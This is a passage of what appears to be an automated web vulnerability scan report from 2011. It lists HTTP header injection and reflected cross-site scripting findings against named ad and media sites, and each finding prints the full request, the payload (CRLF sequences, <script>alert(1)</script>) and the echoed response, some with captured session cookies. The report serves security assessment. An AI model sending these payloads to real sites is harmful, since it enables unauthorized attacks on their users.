Location: http://metrics.apple.com/b/ss/appleglobal,appleusipad/1/H.22.1/s9681528011336?AQB=1&vvpr=true&&ndh=1&t=3%2F1%2F2011%2011%3A50%3A27%204%20360&pageName=ipad%20-%20index%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fipad%2F&r=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.ipad&c4=http%3A%2F%2Fwww.apple.com%2Fipad%2F&c5=win32&c6=%3A%20ipad%20-%20index%20(us)&c9=windows&c14=itunes%20-%20index%20(us)&c15=no%20zip&c17=undefined%3Aundefined&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleusipad&c48=1&c49=D%3Ds_vi&c50=ipad%3D1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1037&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&u=appleglobal,appleitunes,appleusitunesipod&pid=itunes%20-%20index%20(us)&pidt=1&oid=http%3A%2F%2Fwww.apple.com%2Fipad%2F&ot=A&u=0&AQE=124537
2e8dc5adfe9
&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1296755474


2.5. http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.scanscout.com/B4852812.30

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62530%0d%0a230925b8b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62530%0d%0a230925b8b8/N3340.scanscout.com/B4852812.30 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62530
230925b8b8
/N3340.scanscout.com/B4852812.30:
Date: Thu, 03 Feb 2011 22:03:15 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.TMP/B5159652.23

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 333cd%0d%0a3e381d53e01 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /333cd%0d%0a3e381d53e01/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443;ord=5929963708858950656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/333cd
3e381d53e01
/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http: //ad.trafficmp.com/a/click
Date: Fri, 04 Feb 2011 17:55:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 87fe3%0d%0a9a9fc1f6091 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /87fe3%0d%0a9a9fc1f6091/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/87fe3
9a9fc1f6091
/N553.158901.DATAXU/B4970757.4%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D628759578:
Date: Fri, 04 Feb 2011 17:55:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adi/lb.buzzillions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/lb.buzzillions/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9db3a%0d%0aa4d4062d9d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9db3a%0d%0aa4d4062d9d8/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9db3a
a4d4062d9d8
/lb.buzzillions/%3Bnet%3Dlb%3Bu%3D%2Clb-5843489_1296770394%2C11d765b6a10b1b3%2Cnone%2Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%3B%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bcontx%3Dnone%3Bdc%3Dw%3Bbtg%3Dan.:
Date: Fri, 04 Feb 2011 01:50:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cdbde%0d%0ad36a9dd2cc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /spportal/spportalFlow.docdbde%0d%0ad36a9dd2cc?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4 HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/support/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762103|check#true#1296760303; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Thu, 03 Feb 2011 19:19:10 GMT
Location: https://www.supermedia.com/spportal/spportalFlow.docdbde
d36a9dd2cc
?_flowExecutionKey=_c086BB48A-27A9-FE95-CA40-0000B767F5C1_kD178CD9B-A35A-5925-4EF5-B8443B54EAB4
Content-Length: 0
Connection: close


3. Cross-site scripting (reflected)
There are 493 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://abc.go.com/vp2/d/deeplink [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /vp2/d/deeplink

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload bf5ec--><script>alert(1)</script>db1ccd44039 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /vp2/d/deeplinkbf5ec--><script>alert(1)</script>db1ccd44039 HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Content-Length: 4911
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.7 ~~~ Brandid: 001 ~~~ /vp2/d/deeplinkbf5ec--><script>alert(1)</script>db1ccd44039?brandid=001 -->
...[SNIP]...

3.2. http://ads.adap.tv/beacons [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b6987<script>alert(1)</script>1178017b98e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacons?callback=jsonp1296766389465b6987<script>alert(1)</script>1178017b98e HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+13%3A39%3A06";Path=/;Domain=.adap.tv;Expires=Sun, 12-Oct-42 23:25:46 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 170

jsonp1296766389465b6987<script>alert(1)</script>1178017b98e({
   "beacons":["http://tags.bluekai.com/site/2174", "http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif"]
})

3.3. http://ads.gmodules.com/gadgets/ifr [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.gmodules.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 6f421%0aalert(1)//3a48dc45b10 was submitted in the url parameter. This input was echoed as 6f421
alert(1)//3a48dc45b10
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml6f421%0aalert(1)//3a48dc45b10&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D9764709784055921816%26gglcreat%3D9143352621951917205%26sig%3DAGiWqtwyJ0z2eP12NfR0KoaagOUkxWNa_A%26client%3Dca-pub-3033999741136561%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DG7T3ZBT9Zc4%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=chicago%20hotels&up_city=Crystal&up_region=US-MI&up_lat=43.26&up_long=-84.91 HTTP/1.1
Host: ads.gmodules.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=2791779905&w=728&lmt=1296808620&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787020952&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529%2C2067036752&correlator=1296787019866&frm=0&adk=1244530545&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=969342198&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=3&dtd=11&xpc=WZvbsEpZ0D&p=http%3A//www.bizfind.us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 04 Feb 2011 17:55:01 GMT
Expires: Fri, 04 Feb 2011 17:55:01 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 132

Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayakhotel/728x90.xml6f421
alert(1)//3a48dc45b10
. HTTP error 400

3.4. http://advertise.tucows.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f20"-alert(1)-"c17f4a73141 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?41f20"-alert(1)-"c17f4a73141=1 HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:33 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/?41f20"-alert(1)-"c17f4a73141=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.5. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a76"-alert(1)-"4bef7d4836e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes25a76"-alert(1)-"4bef7d4836e/corpbar/cb3.0/css/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:21 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes25a76"-alert(1)-"4bef7d4836e/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.6. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9378"-alert(1)-"68cf811d6fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbarb9378"-alert(1)-"68cf811d6fc/cb3.0/css/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
